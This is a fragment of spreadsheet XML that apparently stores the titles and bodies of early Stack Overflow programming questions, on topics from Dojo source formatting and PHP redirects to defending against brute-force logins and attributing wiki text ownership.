    <t>What's a good way to view dojo's javascript source files in Eclipse with Aptana?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have Aptana installed within Eclipse. I'm working on a project with the dojo 1.2 JavaScript library installed. &lt;/p&gt;
&lt;p&gt;When I open one of dojo's dijit .js files, the code is formatted in a rather difficult to read way. The Eclipse "Outline" view shows a list of functions with names like "_2" and "ew". Not very human friendly. &lt;/p&gt;
&lt;p&gt;I'm talking about source code that looks like this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;dojo.declare("dijit.InlineEditBox",dijit._Widget,{editing:false,autoSave:true,buttonSave:"",buttonCancel:"",renderAsHtml:false,editor:"dijit.form.TextBox",editorParams:{},onChange:function(_1){
  },onCancel:function(){
  },width:"100%",value:"",noValueIndicator:"&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#x270d;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;",constructor:function(){
  this.editorParams={};
  },postMixInProperties:function(){
  this.inherited(arguments);
  this.displayNode=this.srcNodeRef;
  var _2={ondijitclick:"_onClick",onmouseover:"_onMouseOver",onmouseout:"_onMouseOut",onfocus:"_onMouseOver",onblur:"_onMouseOut"};
  for(var _3 in _2){
  this.connect(this.displayNode,_3,_2[_3]);
  }
  dijit.setWaiRole(this.displayNode,"button");
  if(!this.displayNode.getAttribute("tabIndex")){
  this.displayNode.setAttribute("tabIndex",0);
  }
  this.attr("value",this.value||this.displayNode.innerHTML);
  },setDisabled:function(_4){
  dojo.deprecated("dijit.InlineEditBox.setDisabled() is deprecated.  Use attr('disabled', bool) instead.","","2.0");
  this.attr("disabled",_4);&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do I get a clearer, "friendlier" view of such a .js file? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>print_int and other F# print functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to do simple tutorial in Visual Studio
let someNumber = (2 + 2)
print_int someNumber
but it says print_int is undefined. printfn works. 
Could the book I'm using be outdated? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get source of website in java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use java to get the source of a website (secure) and then parse that website for links that are in it. I have found how to connect to that url, but then how can i easily get just the source, preferraby as the DOM Document oso that I could easily get the info I want.&lt;/p&gt;
&lt;p&gt;Or is there a better way to connect to https site, get the source (which I neet to do to get a table of data...its pretty simple) then those links are files i am going to download.&lt;/p&gt;
&lt;p&gt;I wish it was FTP but these are files stored on my tivo (i want to programmatically download them to my computer(&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex 3 - Must I add components before setting their attributes when using AS3?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let us say that I have a Flex 3 mxml component, call it A. A has a get/set attribute called 'b'. Within A I have another internal component C, which is specified using mxml. When "instantiating" component A within mxml, I can specify the value of b at declaration, and everything works fine. However, when I initialize the component using Actionscript, I must first add the component to a rendered container before I can set the attribute (in this case 'b') of said component. This happens when the setter for attribute 'b' somehow accesses C within A.&lt;/p&gt;
&lt;p&gt;So, this fails at runtime (it says that C is null)...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var a:A = new A();
a.b = "woopy"; //Sets the Label (declared in mxml) withn A to "woopy"
this.addChild(a);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the other hand, either of the following will work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;customNamespace:A b="woopy"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var a:A = new A();
this.addChild(a);
a.b = "woopy"; //Sets the Label (declared in mxml) withn A to "woopy"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As shown, no runtime error message is thrown when a attribute is set after a component is added to a container. Ok, this makes sense, I suppose the internals of the component are not actually created until the component is added to a container. Still, this is kind of annoying. Is there any way to guarantee that the component internals are fully rendered without adding it to a container? I don't like the way it feels different when I am using actionscript vs mxml. I want a solution so that basically declaring A in mxml with no attribute "arguments" is equivalent to declaring A using the new operator in AS. At least, in terms of the internal state of A.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ignoring try block in C# command line program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a command line program in C# that I've wrapped with a try-catch block to keep it from crashing the console.  However, while I am debugging it, if an exception is thrown somewhere in the DoStuff() method, Visual Studio will break on the "catch" statement.  I want Visual Studio to break where the exception occurred.  What's the best way to do this?  &lt;/p&gt;
&lt;p&gt;Comment out the try?&lt;br /&gt;
A setting in Visual Sudio?&lt;br /&gt;
An #if DEBUG statement?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void Main(string[] args)
{
    try
    {
        DoStuff();
    }
    catch (Exception e)
    {  //right now I have a breakpoint here
        Console.WriteLine(e.Message);
    }
}
private void DoStuff()
{
    //I'd like VS to break here if an exception is thrown here.
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Rails form validation conditional bypass</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a rails model that validates uniqueness of 2 form values.  If these 2 values aren't unique the validation errors are shows and the "submit" button is changed to "resubmit".  I want to allow a user to  click the "resubmit" button and bypass the model validation.  I want to do something like this from the rails validation documentation:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;code&gt;validates_uniqueness_of :value, :unless =&amp;gt; Proc.new { |user| user.signup_step &amp;lt;= 2 }&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;but I don't have a a value in my model that I can check for...just the params that have the "Resubmit" value.&lt;/p&gt;
&lt;p&gt;Any ideas on how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to speed up the eclipse project 'refresh'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a fairly large PHP codebase (10k files) that I work with using Eclipse 3.4/PDT 2 on a windows machine, while the files are hosted on a Debian fileserver. I connect via a mapped drive on windows.&lt;/p&gt;
&lt;p&gt;Despite having a 1gbit ethernet connection, doing an eclipse project refresh is quite slow. Up to 5 mins. And I am blocked from working while this happens.&lt;/p&gt;
&lt;p&gt;This normally wouldn't be such a problem since Eclipse theoretically shouldn't have to do a full refresh very often. However I use the subclipse plugin also which triggers a full refresh each time it completes a switch/update.&lt;/p&gt;
&lt;p&gt;My hunch is that the slowest part of the process is eclipse checking the 10k files one by one for changes over samba.&lt;/p&gt;
&lt;p&gt;There is a large number of files in the codebase that I would never need to access from eclipse, so I don't need it to check them at all. However I can't figure out how to prevent it from doing so. I have tried marking them 'derived'. This prevents them from being included in the build process etc. But it doesn't seem to speed up the refresh process at all. It seems that Eclipse still checks their changed status.&lt;/p&gt;
&lt;p&gt;I've also removed the unneeded folders from PDT's 'build path'. This does speed up the 'building workspace' process but again it doesn't speed up the actual refresh that precedes building (and which is what takes the most time).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Ethernet receives the bits and forms the Data Link Layer Frame</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am curious to know how the incoming bits at the physical layer are properly framed and sent to the data link layer. How the OS deal with this process.&lt;/p&gt;
&lt;p&gt;It would be grateful if you explained it in detail or give me some links/pdf.&lt;/p&gt;
&lt;p&gt;I am interested to know in depth about Layer 1 and 2 operations.&lt;/p&gt;
&lt;p&gt;Advance Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I symlink multiple directories into one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a feeling that I already know the answer to this one, but I thought I'd check.&lt;/p&gt;
&lt;p&gt;I have a number of different folders:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;images_a/
images_b/
images_c/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can I create some sort of symlink such that this new directory has the contents of all those directories? That is this new "&lt;code&gt;images_all&lt;/code&gt;" would contain all the files in &lt;code&gt;images_a&lt;/code&gt;, &lt;code&gt;images_b&lt;/code&gt; and &lt;code&gt;images_c&lt;/code&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't DynaLoader.pm load SSleay.dll for Net::SSLeay and Crypt::SSLeay?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have Perl v5.10. I am trying to install Net::SSLeay 1.30 and Crypt::SSLeay 0.57.
I have already installed OpenSSL 0.9.8e.&lt;/p&gt;
&lt;p&gt;For Net::SSLeay 1.30 I followed these steps:&lt;/p&gt;
&lt;pre&gt;
perl Makefile.PL -windows C:\openssl
nmake
nmake test  -- test fails
nmake install
perl test.pl
&lt;/pre&gt;
&lt;p&gt;but I got an fatal error as:&lt;/p&gt;
&lt;pre&gt;
D:\perl\Net_SSLeay.pm-1.30&gt;perl -w test.pl
1..20
Can't load 'D:/perl/site/lib/auto/Net/SSLeay/SSLeay.dll' for module Net::SSLeay: load_file:The specified module could not be found at D:/perl/lib/DynaLoader.pm line 203.
 at test.pl line 25
Compilation failed in require at test.pl line 25.
BEGIN failed--compilation aborted at test.pl line 25.
&lt;/pre&gt;
&lt;p&gt;I got the same results for Crypt::SSLeay 0.57.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vehicle tracking system/Jan08</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;we are developing cost effective vehicle tracking system,
 for my knowledge Using GPS to track vehicle costs more.
So we are looking to develop using GPRS system which costs less.&lt;/p&gt;
&lt;p&gt;my doubt is can track the vehicle using only GPRS (not using GPS at all)
  is this possible .please correct if i am wrong if you any documentation or link it will be useful.&lt;/p&gt;
&lt;p&gt;thanks in advance,
 Mahesh&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using a #! comment in ruby running in Ubuntu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to programming and am trying to follow an example which uses #! comment in ruby.&lt;/p&gt;
&lt;p&gt;I am consistently get the message:
   bash: matz.rb: command not found&lt;/p&gt;
&lt;p&gt;I am using this comment:
    #! /usr/bin/env ruby&lt;/p&gt;
&lt;p&gt;I have tried it with and without the space after ! as well as with and without the env. &lt;/p&gt;
&lt;p&gt;when I use the
    $ which ruby &lt;/p&gt;
&lt;p&gt;ruby is in: /usr/bin/ruby&lt;/p&gt;
&lt;p&gt;I have also gone into the operating system and changed the permissions on the file matz.rb to rwx for all users w/ no effect.  Am I doing something wrong or do I have my system set up incorrectly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing TextBox Column in RadGrid By Telerik</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi There
Do you know how to access textboxes added to a radgrid that are not bound but are used to trap any row related input a user typed in to the textbox for that column.
I need to access this data server side when a postback occurs.
Your thoughts are greatly appreciated
Thanking you&lt;/p&gt;
&lt;p&gt;Tony&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Grouping by a report item in SSRS 2005 - textbox - any workarounds?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to group by a report item, but that's not allowed.
So I tried creating a parameter...not allowed as well.
Tried referencing from footer...failed again.&lt;/p&gt;
&lt;p&gt;This is somewhat complicated.
Let me explain:&lt;/p&gt;
&lt;p&gt;I have textbox22, it's value is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=Code.Calc_Factor(Fields!xx.Value, fields!yy.Value...)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is embedded VB code in the report that's called for each row to calculate a standard factor.&lt;/p&gt;
&lt;p&gt;Now to calculate the deviation from the standard factor, I use textbox89, whose value is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=(Fields!FACTOR.Value - ReportItems!textbox22.Value)/ReportItems!textbox22.Value
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Don't get confused between &lt;code&gt;Fields!FACTOR.Value&lt;/code&gt; and &lt;code&gt;textbox22.Value&lt;/code&gt;, they are different.
&lt;code&gt;Fields!FACTOR.Value&lt;/code&gt; is the factor used, &lt;code&gt;textbox22.Value&lt;/code&gt; is what it should be (standard factor).&lt;/p&gt;
&lt;p&gt;Now I want to create a group which splits deviations into 2 groups, &gt; 1% or not.
So I tried creating a group:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=IIF(ReportItems!textbox89.Value &amp;gt; 1,0,1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...But then SSRS complains about using report items.&lt;/p&gt;
&lt;p&gt;I have run into a similar problem of using report items in the past, but this is a new case!&lt;/p&gt;
&lt;p&gt;Any help greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to return more than one value from a function in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to return more than one variable from a function in Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass a COM method as a function argument? And Microsoft Compiler error C3867</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to pass a COM method as a function argument but I get this error (Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.30729.01 for 80x86):&lt;/p&gt;
&lt;p&gt;error C3867: 'IDispatch::GetTypeInfoCount': function call missing argument list; use '&amp;amp;IDispatch::GetTypeInfoCount' to create a pointer to member&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
&lt;p&gt;Thank you very much.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;atlbase.h&amp;gt;
void update( HRESULT(*com_uint_getter)(UINT*), UINT&amp;amp; u )
{
   UINT tmp;
   if ( S_OK == com_uint_getter( &amp;amp;tmp ) ) {
      u = tmp;
   }
}
// only for compile purpose, it will not work at runtime
int main(int, char*[])
{
   // I choose IDispatch::GetTypeInfoCount just for the sake of exemplification
   CComPtr&amp;lt; IDispatch &amp;gt; ptr;
   UINT u;
   update( ptr-&amp;gt;GetTypeInfoCount, u );
   return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C# multiple string match</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need C# string search algorithm which can match multiple occurance of pattern. For example, if pattern is 'AA' and string is 'BAAABBB' Regex produce match result Index = 1, but I need result Index = 1,2. Can I force Regex to give such result? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change Control Document</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting to lead a lot of reforms at the company where I work and the next thing I want try get in place is a decent change control document. I've searched but I can't find a template so far.&lt;/p&gt;
&lt;p&gt;Would it be possible to maybe share some Change Control documents amongest ourselves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integer.Parse vs. CInt</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Basically, I have been using both &lt;code&gt;Integer.Parse&lt;/code&gt; and &lt;a href="https://msdn.microsoft.com/en-us/library/s2dy91zy.aspx" rel="nofollow"&gt;CInt&lt;/a&gt; in most of my daily programming tasks, but I'm a little bit confused of what the difference is between the two.&lt;/p&gt;
&lt;p&gt;What is the difference between &lt;code&gt;Integer.Parse&lt;/code&gt; and &lt;code&gt;CInt&lt;/code&gt; in VB.NET?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In statement for LINQ to objects</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an equivalent of a SQL IN statement in LINQ to objects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP Header redirect not working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;include('header.php');
$name = $_POST['name'];
$score = $_POST['score'];
$dept = $_POST['dept'];
$MyDB-&amp;gt;prep("INSERT INTO demo (`id`,`name`,`score`,`dept`, `date`) VALUES ('','$name','$score','$dept','$date')");
// Bind a value to our :id hook
// Produces: SELECT * FROM demo_table WHERE id = '23'
$MyDB-&amp;gt;bind(':date', $date);
// Run the query
$MyDB-&amp;gt;run();
header('Location:index.php');
    exit;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code keeps giving me an issue with the redirect. The error is: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Warning: Cannot modify header information - headers already sent by (output
started at /Applications/MAMP/htdocs/testygubbins/OO/test/header.php:15) in
/Applications/MAMP/htdocs/testygubbins/OO/test/form.php on line 16.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am totally flummoxed by this. Does anyone know what I should be doing to make it work?&lt;/p&gt;
&lt;p&gt;EDIT&lt;/p&gt;
&lt;p&gt;header.php code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?php
include('class.user.php');
include('class.Connection.php');
$date = date('Y-m-j');
?&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;link rel=StyleSheet href="css/style.css" type="text/css" media=screen&amp;gt;
    &amp;lt;title&amp;gt;Test&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div id="page"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>PHP PDF-Generation - IE7/Acrobat8: "Website cannot be displayed"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got some trouble with displaying pdfs in IE7 (which were generated by R&amp;amp;OS' ezpdf).&lt;/p&gt;
&lt;p&gt;IE7 with Acrobat Reader 8.1.2. says "The page cannot be displayed"&lt;/p&gt;
&lt;p&gt;Other Browsers (like FF3/Acrobat 8.1.2. or IE6/Acrobat 7) have no problem with the file.&lt;/p&gt;
&lt;p&gt;The following headers are returned by the server:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Date: Thu, 08 Jan 2009 10:52:40 GMT&lt;br&gt;
  Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.5 DAV/2&lt;br&gt;
  X-Powered-By: PHP/5.2.5&lt;br&gt;
  Expires: Thu, 19 Nov 1981 08:52:00 GMT&lt;br&gt;
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0&lt;br&gt;
  Pragma: no-cache&lt;br&gt;
  Content-Length: 4750&lt;br&gt;
  Keep-Alive: timeout=5, max=100&lt;br&gt;
  Connection: Keep-Alive&lt;br&gt;
  Content-Type: application/pdf&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anybody know how to fix this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>modelbinder with dropdownlist in asp.net mvc</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's what I'm trying to do : &lt;/p&gt;
&lt;p&gt;I have an entity &lt;strong&gt;Task&lt;/strong&gt; with a TaskName property and a &lt;strong&gt;TaskPriority&lt;/strong&gt; property.&lt;/p&gt;
&lt;p&gt;Now, in the html I have :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;td&amp;gt;&amp;lt;%=Html.TextBox("Task.TaskName") %&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td&amp;gt;&amp;lt;%=Html.DropDownList("Task.TaskPriority",new SelectList(ViewData.Model.TaskPriorities,"ID","PriorityName")) %&amp;gt;&amp;lt;/td&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Controller action is like this : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ActionResult Create(Task task){
    //task.TaskName has the correct value
    //task.TaskPriority is null - how should the html look so this would work ?
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
In the example bellow (from Schotime) : &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Task
{
    public int name { get; set; }
    public string value { get; set; } // what if the type of the property were Dropdown ?
       // in the example I gave the Task has a property of type: TaskPriority.
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Rounded Swing JButton using Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Well, I have an image that I would like to put as a background to a button (or something clicable). The problem is that this image is round, so I need to show this image, without any borders, etc.&lt;/p&gt;
&lt;p&gt;The JComponent that holds this button has a custom background, so the button really needs to only show the image.&lt;/p&gt;
&lt;p&gt;After searching Google, I couldn't manage to do so. I have tried all the following, but with no luck:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;button.setBorderPainted(false);
button.setContentAreaFilled(false);
button.setOpaque(true);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And after I paint the icon at the background, the button paints it, but holds an ugly gray background with borders, etc. I have also tried to use a JLabel and a JButton. And to paint an ImageIcon at it, but if the user resizes or minimizes the window, the icons disappear!&lt;/p&gt;
&lt;p&gt;How can I fix this?&lt;/p&gt;
&lt;p&gt;I just need to paint and round an image to a JComponent and listen for clicks at it...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>StringDictionary not saving as user setting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a user scoped setting with the type "System.Collections.Specialized.StringDictionary".  Whenever I open the local settings, I can see it in the config, but it's empty.&lt;/p&gt;
&lt;p&gt;I have other user settings that save correctly, but this dictionary doesn't seem to be saving at all.&lt;/p&gt;
&lt;p&gt;Is there something I need to do in order to get a dictionary to save?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Grouping Regular expression BackReferences</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following RegEx&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;id=(.*?) | id="(.*?)"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason for this is I am trying to replace Ids from the browsers DOM using JavaScript. IE, however strips quotes from element atributes as it appears not to require them in the DOM&lt;/p&gt;
&lt;p&gt;The problem I have is that the backrefererences from each alternate statement are in separate groups ($1 and $2)  as the match is only one OR the other can I return both the backreference as a single backreference?&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div id="test1" /&amp;gt;&amp;lt;div id=test2 /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will match as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    match         |  $1   |   $2
--------------------------------
    id="test1"    | test1 |
    id=test2      |       |  test2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I just want both backreferences to be added to $1&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2000 intermittent connection exceptions on production server - specific environment problem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've been having intermittent problems causing users to be forcibly logged out of out application.&lt;/p&gt;
&lt;p&gt;Our set-up is ASP.Net/C# web application on Windows Server 2003 Standard Edition with SQL Server 2000 on the back end. We've recently performed a major product upgrade on our client's VMWare server (we have a guest instance dedicated to us) and whereas we had none of these issues with the previous release the added complexity that the new upgrade brings to the product has caused a lot of issues. We are also running SQL Server 2000 (build 8.00.2039, or SP4) and the IIS/ASP.NET (.Net v2.0.50727) application on the same box and connecting to each other via a TCP/IP connection.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Primarily, the exceptions being thrown are:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.IndexOutOfRangeException: Cannot find table 0.&lt;/p&gt;
  &lt;p&gt;System.ArgumentException: Column 'password' does not belong to table Table. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;[This exception occurs in the log in script, even though there is clearly a password column available]&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.InvalidOperationException: There is already an open DataReader associated with this Command which must be closed first. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;[This one is occurring very regularly]&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.InvalidOperationException: This SqlTransaction has completed; it is no longer usable.&lt;/p&gt;
  &lt;p&gt;System.ApplicationException: ExecuteReader requires an open and available Connection. The connection's current state is connecting.&lt;/p&gt;
  &lt;p&gt;System.Data.SqlClient.SqlException: Timeout expired.  The timeout period elapsed prior to completion of the operation or the server is not responding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And just today, for the first time:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.Web.UI.ViewStateException: Invalid viewstate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;We have load tested the app using the same number of concurrent users as the production server and cannot reproduce these errors. They are very intermittent and  occur even when there are only 8/9/10 user connections. My gut is telling me its ASP.NET - SQL Server 2000 connection issues..&lt;/p&gt;
&lt;p&gt;We've pretty much ruled out code-level Data Access Layer errors at this stage (we've a development team of 15 experienced developers working on this) so we think its a specific production server environment issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>\\\\$ converted to \$ in jsp template data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just stumbled unto a weirdness in my JSP code. It seems that a double backslash followed by a dollar or percent symbol gets converted to a single backslash (plus symbol).&lt;/p&gt;
&lt;p&gt;That is, the following JSP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8" %&amp;gt;
\\#
\\$
\\%
\\^
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;gets rendered as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\\#
\$
\%
\\^
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using JDK 1.6.0_02 and Apache Tomcat 5.5.23 and 6.0.16 (two machines).&lt;/p&gt;
&lt;p&gt;Is this a bug in Tomcat? JDK? Or is it conforming to some obscure option in the JSP spec? I tried looking at the spec but couldn't find anything useful.&lt;/p&gt;
&lt;p&gt;Workarounds are fairly trivial, I just thought I'd file a bug in case it is one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Heh, stackoverflow also mangles backslashes&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Preventing Brute Force Logins on Websites</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a response to the recent &lt;a href="http://blog.wired.com/27bstroke6/2009/01/professed-twitt.html"&gt;Twitter hijackings&lt;/a&gt; and &lt;a href="http://www.codinghorror.com/blog/archives/001206.html"&gt;Jeff's post on Dictionary Attacks&lt;/a&gt;, what is the best way to secure your website against brute force login attacks?&lt;/p&gt;
&lt;p&gt;Jeff's post suggests putting in an increasing delay for each attempted login, and a suggestion in the comments is to add a captcha after the 2nd failed attempt.&lt;/p&gt;
&lt;p&gt;Both these seem like good ideas, but how do you know what "attempt number" it is?  You can't rely on a session ID (because an attacker could change it each time) or an IP address (better, but vulnerable to botnets).  Simply logging it against the username could, using the delay method, lock out a legitimate user (or at least make the login process very slow for them).&lt;/p&gt;
&lt;p&gt;Thoughts? Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determining "Owner" of Text Edited by Multiple Users</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You may have noticed that we now show an edit summary on Community Wiki posts:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;community wiki&lt;br /&gt;
  220 revisions, 48 users&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'd like to also show the user who "most owns" the final content displayed on the page, as a percentage of the remaining text:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;community wiki&lt;br /&gt;
  220 revisions, 48 users&lt;br /&gt;
  &lt;strong&gt;kronoz&lt;/strong&gt; 87%&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Yes, there could be top (n) "owners", but for now I want the top 1.&lt;/p&gt;
&lt;p&gt;Assume you have this data structure, a list of user/text pairs ordered chronologically by the time of the post:&lt;/p&gt;
&lt;pre&gt;
User Id     Post-Text
-------     ---------
12          The quick brown fox jumps over the lazy dog.
27          The quick brown fox jumps, sometimes.
30          I always see the speedy brown fox jumping over the lazy dog.
&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Which of these users most "owns" the final text?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm looking for a reasonable algorithm -- it can be an approximation, it doesn't have to be perfect -- to determine the owner. Ideally expressed as a percentage score.&lt;/p&gt;
&lt;p&gt;Note that we need to factor in edits, deletions, and insertions, so the final result feels reasonable and right. You can use any stackoverflow post with a decent revision history (not just retagging, but frequent post body changes) as a test corpus. Here's a good one, with 15 revisions from 14 different authors. Who is the "owner"?&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/revisions/327973/list"&gt;http://stackoverflow.com/revisions/327973/list&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Click "view source" to get the raw text of each revision.&lt;/p&gt;
&lt;p&gt;I should warn you that a pure algorithmic solution might end up being a form of the &lt;a href="http://en.wikipedia.org/wiki/Longest_common_substring_problem" rel="nofollow"&gt;Longest Common Substring Problem&lt;/a&gt;. But as I mentioned, approximations and estimates are fine too if they work well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solutions in any language are welcome&lt;/strong&gt;, but I prefer solutions that are&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Fairly easy to translate into c#.&lt;/li&gt;
&lt;li&gt;Free of dependencies. &lt;/li&gt;
&lt;li&gt;Put simplicity before efficiency.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;It is extraordinarily rare for a post on SO to have more than 25 revisions. But it should "feel" accurate, so if you eyeballed the edits you'd agree with the final decision. I encourage you to &lt;strong&gt;test your algorithm out on stack overflow posts with revision histories&lt;/strong&gt; and see if you agree with the final output.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
